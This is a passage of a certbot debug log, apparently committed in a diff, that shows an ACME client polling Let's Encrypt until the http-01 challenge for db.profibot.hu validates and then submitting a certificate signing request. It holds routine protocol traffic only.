"status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:09:56,480:DEBUG:acme.client:Storing nonce: fULB7aUJ2yCdOxesQkDCo2_dalrWMy3MrwKoO_BNN0pLZ_5H-tw +2025-12-25 04:09:56,480:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:09:59,482:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:59,486:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjJ5Q2RPeGVzUWtEQ28yX2RhbHJXTXkzTXJ3S29PX0JOTjBwTFpfNUgtdHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "LT8reJZXmzRrQQnBrQZuJ1vB_K1e7muSZAs7LnT2xjdNDoq3Jfu9Y-unqfCpOsz1c1f4bAbPIGO2LTOdVIav_20hMcFaxlpyXlZOR-tkXUZE3ixVRTUkEDjXmXnIGysH5G1tavTbiPaYy510R-A-7uSifrkD4Z79DU_l-N5x-uE4oW03RuPlpQslDWHnS2DbaInPiNzSELtv6mv1LFfSHsXXPXi89UYllKQpS2q3YVpNWipHGk5b3nsD1C9ICqe7q0Dj209BbN-xMuX6_AzTWPXS7wWyQd64fBeRBaVgkcOp_Yoj5yYWMXegM-XhxjhoImzKq9pm-dp-etlVF4QiqQ", + "payload": "" +} +2025-12-25 04:09:59,641:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:09:59,642:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:59 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJeujFQnovsxLrvc2aNYHGQhptNsh39cU4UhAx0mJZ2iw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:09:59,642:DEBUG:acme.client:Storing nonce: fULB7aUJeujFQnovsxLrvc2aNYHGQhptNsh39cU4UhAx0mJZ2iw +2025-12-25 04:09:59,643:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:02,644:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:02,647:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmV1akZRbm92c3hMcnZjMmFOWUhHUWhwdE5zaDM5Y1U0VWhBeDBtSloyaXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "C7hXS7KLwKsDVmDunimXg35D-zHsQ9BfOp3uU9QkKLdFkqYWiSGeDRExEVmQaVGtVaxKfV8_lQZLVEqjGNzkhijXdT5rIH25S3YaQ5_AHxkpdzdk_VcnMgn1ClAn3iYvvhFxrrm5Nx9HgsH7Y_nrgUX9RnCrCX88g828udiZcxbg7jrvzU6oAYPf_-GlvdPqv5UfNA7UsxOHXExkWIjDF2W48jQE4n8IEXsxmdVJisty3gYI6fCja_QKuPSWBCpSaE2qhxJvAjO8C683CnQag5bgM3W_UiDN7RJcXQi7eImgPlxLWMu4h_aCva1VdoMgXpOTRL5MgmQOYWv23LyW9w", + "payload": "" +} +2025-12-25 04:10:02,802:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:02,803:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:02 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJju2amfc9uFHSeA4ULye0lXKj99nXM0JgS2jF9V6OZx4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:02,804:DEBUG:acme.client:Storing nonce: fULB7aUJju2amfc9uFHSeA4ULye0lXKj99nXM0JgS2jF9V6OZx4 +2025-12-25 04:10:02,804:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:05,805:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:05,809:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmp1MmFtZmM5dUZIU2VBNFVMeWUwbFhLajk5blhNMEpnUzJqRjlWNk9aeDQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "PEINKZjKDPdu5rmKZXe45lEA4W_KFY9jkOE9qv7WjmCTKqaK5Ad2bNOmLYyZCDohSALdp2gKkqZf8_NoL12adnZb8dZMACSoqHQwM5ifN9QXVw6yZwQY-nr9IV4NLSpEoMw5QzG6ajaS7rqmyAou9dVyIEjgKvTenn0fao0hajxsOqUZDrRQnV0dA4ehEcRow37CYk8Y3Vbq-alehLWVyM4j558KTZM6F8Ofy5wcDsqxewqFjbzXgUcCYVMdly2RbGARxDlN8t5heZT536IbrYVmyR6QrmXIgS1vMduFEXWDfeYWgWFjW--UDnaKHEm_niqg_puEhDAsS3hUHrm5xQ", + "payload": "" +} +2025-12-25 04:10:05,966:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:05,967:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:05 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJAkUc_l5cYSQDweXETe9KE2EiLeDCNxaEGpBvtwSCL68 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:05,967:DEBUG:acme.client:Storing nonce: fULB7aUJAkUc_l5cYSQDweXETe9KE2EiLeDCNxaEGpBvtwSCL68 +2025-12-25 04:10:05,968:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:08,969:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:08,972:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkFrVWNfbDVjWVNRRHdlWEVUZTlLRTJFaUxlRENOeGFFR3BCdnR3U0NMNjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "KpknX9j0QlzXbvot6NAXUNlFuqWLX0Ubu6XlFxjDMOnSe076y1EkQcBD32vKuVqMxGb_5hC10a_1z3PH_d2cTgnfJJjxYQDmq1KiRWzKVKyhnAs7wx3QJhezICGkwIMRz1CKPnneQGVpKPiD2ZnkA8CmgA4tYfkoo_O2He9B2EouHXkgwFBN12KjaMXVQxl3S9JbGcCEpzCkwdn_xi8z-BoC0iDrxuwnkKjss2dzTZkSdATPwoJMmZU6Y0NHBRyJl-60xEliaw1FAxNe8OLQcYPRVH4NSl1uNDks9LYmu8iA-L0OEF0Cww3o2vxaNF3iQTFskQk0_WuNANPJ8JT-Zw", + "payload": "" +} +2025-12-25 04:10:09,127:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:09,128:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:09 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJbDxaBLJMMh-A5W9QLa3ulHWeb3tYkgbHbUisirf6C_c +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:09,128:DEBUG:acme.client:Storing nonce: fULB7aUJbDxaBLJMMh-A5W9QLa3ulHWeb3tYkgbHbUisirf6C_c +2025-12-25 04:10:09,129:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:12,130:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:12,134:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmJEeGFCTEpNTWgtQTVXOVFMYTN1bEhXZWIzdFlrZ2JIYlVpc2lyZjZDX2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "Hq769IXiO3GaW-Dc9DB_2sUzsPqtS94DMvBHeeK_sMu0_tUP7rHxHy0iROmZoePlleHrqU9Z7dPFGFqBCDMAXfDGRLfFBg1EhIszB99Ns_ZViDBCdZRG0T9XKeA-2gS-Kxa-npE2iGNrc5GRSS_2FL_aUj46kDOA9SDrd1vXFHhUQSJWqkbhCjpqdflaJiDcOAqfXYKac_yDVV_FB60Q4RH6AqAekddWbIDAFiUH6wULDrz2bhuZKI4n5t_QQpbj0WkjdYNZ35xRlocaBPkl1uH8OpDJj44s9R1HAVbmYV3rueZJqyiKEemhAPy2E1hRzszgoC9FINc-GbYRg0VtbQ", + "payload": "" +} +2025-12-25 04:10:12,302:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:12,303:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:12 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJpN4EnNNj53_l2ZCY1tXoIVEFEEoxenYO5Ogb6A9hS7M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:12,303:DEBUG:acme.client:Storing nonce: fULB7aUJpN4EnNNj53_l2ZCY1tXoIVEFEEoxenYO5Ogb6A9hS7M +2025-12-25 04:10:12,304:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:15,305:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:15,309:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnBONEVuTk5qNTNfbDJaQ1kxdFhvSVZFRkVFb3hlbllPNU9nYjZBOWhTN00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "R2y3gf1e_KqjEcDoBdyIm-z3du1iozsu_uQBVrfheVavfOcEG8mqZj4rFygLokzT16DgGPN9J8Sd5utIGGpIlkr9HUjzLKRy-e2V9Xt2qNF6A7_Qe9JkF3c5IeOe-jPBuJzlcjtf78549LVEzCHqqSaH8c0P1Px_iOIdoSo5fLKnQtWqFiMpCTPORZ7Qhag_g0d5NMhnFA0DpQpX1O_btaPeZWa5GiCT7YLsWgvy64eFiiFz_JQuSJwkiZPB7vAvoYcfBVNJXELRZet_UWbH4CI3thQlD0sUoCH-ub_ubURYc7TwnTQLJhLYiaNVVL2JFbac93Bxe7HaZYNe_LsF5A", + "payload": "" +} +2025-12-25 04:10:15,465:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:15,466:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:15 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEI8g1YnpTpr8ZbwddmFtDK4GUrUmgcorkpeZgZ6T4Ic0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:15,467:DEBUG:acme.client:Storing nonce: 58tS3qjEI8g1YnpTpr8ZbwddmFtDK4GUrUmgcorkpeZgZ6T4Ic0 +2025-12-25 04:10:15,467:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:18,468:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:18,471:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUk4ZzFZbnBUcHI4WmJ3ZGRtRnRESzRHVXJVbWdjb3JrcGVaZ1o2VDRJYzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "USt2lfSlqabTgZPlBWxa6N4WWIm7qr33fY4pEBplw9PBZjVdHl16MA9TFm--UwPxu0h4d7OwqJgmFKRC_P9FK2HMs5kQPr9s_rz2jDk1qoq21RNRolFEhqgvjM7OnrjI0N0o9lH5UjYIMggY8eS4pPD6u70M2E32Bf1YJ0wSFCATy6Ki3BWR3tG3SL9uybprVFbvj3zK6y2OVJT3AVS70HAhKXhsnOcswSdkuylb3JpqDtTHjJFtX73NWiu3lY7luxnLTDdgNf2O3z8nm_XhG4rAt8MnwuV1FkjO3vnDBwffigfeQY5XBmL2wec-SynxlnCxDFmQvlYQuwtL-WDkLw", + "payload": "" +} +2025-12-25 04:10:18,627:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:10:18,628:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:18 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEry4rxguzbRh8i1SneLoFIrOS_P1oSv3o3sb8XhDuMbo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:10:18,628:DEBUG:acme.client:Storing nonce: 58tS3qjEry4rxguzbRh8i1SneLoFIrOS_P1oSv3o3sb8XhDuMbo +2025-12-25 04:10:18,629:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:10:21,630:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:21,634:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXJ5NHJ4Z3V6YlJoOGkxU25lTG9GSXJPU19QMW9TdjNvM3NiOFhoRHVNYm8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "gwRnS1oTjo0DB93QhiRIGnL1opIJJj356t2Mv89EIRUI3Z9vQDDltrSIpKeUHrcU_oJNvmdXdC1qlANSJ_xN98jHEj7XD_GGQK2TvlZoHJTz-umpSinMWF_Q0UbPph40aBbyJ6Swya2t97yDU6YKJcn9ipTi6NY5lcnldxUwTqh3G6sBXb-Yc85jOgAfxjP87kpRZIHB2F0iZ6Ze3ZYY0uiyytW46igqGoND_kl9pS9_U8YvxtA-483IOeLfYHSc7yWxzJH-um6BQcNx9OqfnAi-5toqaq6rp7tYk_cCtgwrb4zNPDQHYLVuKe793E7P4ATIRhi9LHfsBILC3oJPDw", + "payload": "" +} +2025-12-25 04:10:21,789:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 767 +2025-12-25 04:10:21,790:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:21 GMT +Content-Type: application/json +Content-Length: 767 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjELJCAFp7PL_Nb-kuuNONWqSzVxmvIi5GfNgQiwRrRVv8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "valid", + "expires": "2026-01-24T04:10:20Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "valid", + "validated": "2025-12-25T04:09:48Z", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ", + "validationRecord": [ + { + "url": "http://db.profibot.hu/.well-known/acme-challenge/PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ", + "hostname": "db.profibot.hu", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-25 04:10:21,790:DEBUG:acme.client:Storing nonce: 58tS3qjELJCAFp7PL_Nb-kuuNONWqSzVxmvIi5GfNgQiwRrRVv8 +2025-12-25 04:10:21,791:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-25 04:10:21,791:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-25 04:10:21,791:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ +2025-12-25 04:10:21,792:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-25 04:10:21,793:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJDCBqwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEWXMvMEIeqT/BIiIv\nbx32iIua7YMHHNdIxCzLlP2hho74rE67sXKwcvt18MKcZfIDsqM6fzoTlCtDRzHm\njtAe8/iaVvBB2RmkXKB17FQrGA9t5cLqBm2xJ5x31rQ0qQtBoCwwKgYJKoZIhvcN\nAQkOMR0wGzAZBgNVHREEEjAQgg5kYi5wcm9maWJvdC5odTAKBggqhkjOPQQDAgNo\nADBlAjAxgQP0MIhF96QGS37j5VPDFWgGyNY6irPD4csKAvhuzs3L5cR4QvRwiZZP\nm8sW2uoCMQDxU6iTyQi+DB8Ho8OO/rESsnhOmAL5pwWFWzhiQ4vKKUFGD4ME7XgG\ne7mEV2dvZkk=\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2025-12-25 04:10:21,793:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2025-12-25 04:11:51.793662 +2025-12-25 04:10:21,794:DEBUG:acme.client:JWS payload: +b'{\n "csr": 